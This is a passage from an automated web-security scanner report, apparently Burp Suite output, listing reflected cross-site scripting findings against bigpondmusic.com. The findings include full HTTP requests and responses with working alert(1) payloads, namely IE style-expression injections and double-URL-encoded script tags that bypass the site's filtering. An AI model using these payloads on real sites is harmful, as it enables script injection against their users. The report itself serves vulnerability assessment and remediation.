User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
v=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bigpondrecommends52be7';8ce78a5cd85';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.190. http://bigpondmusic.com/bigpondrecommends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e216c"style%3d"x%3aexpression(alert(1))"e688e780f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e216c"style="x:expression(alert(1))"e688e780f68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bigpondrecommends?e216c"style%3d"x%3aexpression(alert(1))"e688e780f68=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154471


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>What are BigPond Music liste
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends?e216c"style="x:expression(alert(1))"e688e780f68=1" />
...[SNIP]...

2.191. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dc80'%3b9d005988f07 was submitted in the REST URL parameter 1. This input was echoed as 4dc80';9d005988f07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf4dc80'%3b9d005988f07/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87944


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf4dc80';9d005988f07';
   s.prop4 = 'header';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s
...[SNIP]...

2.192. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876 was submitted in the REST URL parameter 1. This input was echoed as 1ed91"><script>alert(1)</script>fc31052876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf1ed91"><script>alert(1)</script>fc31052876/header/adh.html" />
...[SNIP]...

2.193. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772 was submitted in the REST URL parameter 2. This input was echoed as 664ab"><script>alert(1)</script>a352504a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88221


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header664ab"><script>alert(1)</script>a352504a772/adh.html" />
...[SNIP]...

2.194. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c89'%3bfd2f58241 was submitted in the REST URL parameter 2. This input was echoed as e6c89';fd2f58241 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/headere6c89'%3bfd2f58241/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
st,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'headere6c89';fd2f58241';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.pro
...[SNIP]...

2.195. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6ce5'%3b3ca787e9e3c was submitted in the REST URL parameter 3. This input was echoed as b6ce5';3ca787e9e3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/header/adh.htmlb6ce5'%3b3ca787e9e3c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
straglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'header';
   s.prop5 = 'adh.htmlb6ce5';3ca787e9e3c';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.196. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf was submitted in the REST URL parameter 3. This input was echoed as eed67"><script>alert(1)</script>ee34394dbaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header/adh.htmleed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header/adh.htmleed67"><script>alert(1)</script>ee34394dbaf" />
...[SNIP]...

2.197. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3 was submitted in the REST URL parameter 1. This input was echoed as e9ce7"><script>alert(1)</script>5240436d2f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphfe9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphfe9ce7"><script>alert(1)</script>5240436d2f3/res/js/bphf_menu.js" />
...[SNIP]...

2.198. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5936'%3b1c8e57db835 was submitted in the REST URL parameter 1. This input was echoed as a5936';1c8e57db835 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphfa5936'%3b1c8e57db835/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphfa5936';1c8e57db835';
   s.prop4 = 'res';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel
...[SNIP]...

2.199. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89 was submitted in the REST URL parameter 2. This input was echoed as 1fa67"><script>alert(1)</script>84ddb0ecf89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res1fa67"><script>alert(1)</script>84ddb0ecf89/js/bphf_menu.js" />
...[SNIP]...

2.200. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db736'%3bb0de1f819 was submitted in the REST URL parameter 2. This input was echoed as db736';b0de1f819 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/resdb736'%3bb0de1f819/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
